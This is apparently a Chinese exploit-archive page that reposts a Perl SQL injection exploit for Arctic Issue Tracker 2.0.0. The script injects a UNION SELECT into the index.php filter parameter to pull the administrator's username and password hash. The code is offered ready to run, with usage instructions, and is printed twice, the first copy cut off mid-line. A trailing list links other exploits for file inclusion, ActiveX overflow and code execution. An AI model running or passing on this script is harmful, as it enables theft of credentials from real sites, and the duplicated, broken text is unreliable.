Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
互联网 发布时间:2008-10-08 21:04:34 作者:佚名 我要评论
#!/usr/bin/perl
use IO::Socket;
print q{
-----------------------------------------------
Arctic Issue Tracker v2.0.0 exploit by ldma
~ SubCode ~
use: arctic.pl [server] [dir]
sample:
$perl arctic.pl localhos
#!/usr/bin/perl
use IO::Socket;
print q{
-----------------------------------------------
Arctic Issue Tracker v2.0.0 exploit by ldma
~ SubCode ~
use: arctic.pl [server] [dir]
sample:
$perl arctic.pl localhost /arctic/
----------------------------------------------- }; $webpage = $ARGV[0];
$directory = $ARGV[1];
print " -initiating\n";
print "|--modules..OK!\n";
sleep 1;
print "|--premodules..OK!\n";
sleep 1;
print "|--preprocessors..OK!\n";
sleep 1;
print " -opening channel.. OK!\n";
sleep 2;
print "--------------------------------------------\n";
print "~ configuration complete.. OK!\n";
print "~ scanning";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
if (!$webpage) { die "\ rtfm geek\n"; } $wbb_dir =
"http://".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1--"; print "~ connecting";
$|=1;
foreach (1..1) {
print ".";
sleep 1;
}
print " OK!\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can't connect to Server\n"; print "~ open exploiting-tree";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";
print "[ ] Target: $webpage\n";
while ($answer = <$sock>) {
if ($answer =~ /Current Filter: <strong>(.*)<\/strong>/) {
print "exploiting in progress";
$|=1;
foreach (1..3) {
print "...";
sleep 1;
}
print "OK!\n[ ] vuln: OK!\n\n\nwell done, ldma!\n\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "[ ] USER-ID: -1\n";
print "[ ] ID-HASH: $1\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
exit();
}
} close($sock); # ldma
print q{
-----------------------------------------------
Arctic Issue Tracker v2.0.0 exploit by ldma
~ SubCode ~
use: arctic.pl [server] [dir]
sample:
$perl arctic.pl localhost /arctic/
----------------------------------------------- }; $webpage = $ARGV[0];
$directory = $ARGV[1];
print " -initiating\n";
print "|--modules..OK!\n";
sleep 1;
print "|--premodules..OK!\n";
sleep 1;
print "|--preprocessors..OK!\n";
sleep 1;
print " -opening channel.. OK!\n";
sleep 2;
print "--------------------------------------------\n";
print "~ configuration complete.. OK!\n";
print "~ scanning";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
if (!$webpage) { die "\ rtfm geek\n"; } $wbb_dir =
"http://".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1--"; print "~ connecting";
$|=1;
foreach (1..1) {
print ".";
sleep 1;
}
print " OK!\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can't connect to Server\n"; print "~ open exploiting-tree";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";
print "[ ] Target: $webpage\n";
while ($answer = <$sock>) {
if ($answer =~ /Current Filter: <strong>(.*)<\/strong>/) {
print "exploiting in progress";
$|=1;
foreach (1..3) {
print "...";
sleep 1;
}
print "OK!\n[ ] vuln: OK!\n\n\nwell done, ldma!\n\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "[ ] USER-ID: -1\n";
print "[ ] ID-HASH: $1\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
exit();
}
} close($sock); # ldma
相关文章
- 昨晚跟@Sunshine 请教了下终端机的玩法,顺便翻了翻资料。总结了以下的几种方法2013-06-19
Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability
--== ========================================================= ==-- --== Wizi Wiki Wig Local File Inclusion Vulnerability ==-- --== =============2008-10-08File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities
| File Store PRO 3.2 Blind SQL Injection | |________________________________________| Download from: http://upoint.info/cgi/demo/fs/filestore.zip2008-10-08Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerabi
##################################################################### # # Facebook Newsroom Application Remote File Inclusion Vulnerability # ######2008-10-08DreamNews Manager (id) Remote SQL Injection Vulnerability
######################################################### # # dreamnews ( rss) Remote SQL Injection Vulnerability #================================2008-10-08gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability
###################################################################################################### gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulner2008-10-08phpDatingClub (website.php page) Local File Inclusion Vulnerabilit
######################################################### # # phpDatingClub Local File Include Vulnerability #=====================================2008-10-08Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Expl
<html> <body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target /> </object> <script language=javascript2008-10-08Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
<?php /* . vuln.: Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploit . download: http://www.quicksilverforums.com/ . . author: irk4z[2008-10-08IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
/** ** ** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit. ** ** Based on exploit by Koshi (written in Perl). This one should be2008-10-08
最新评论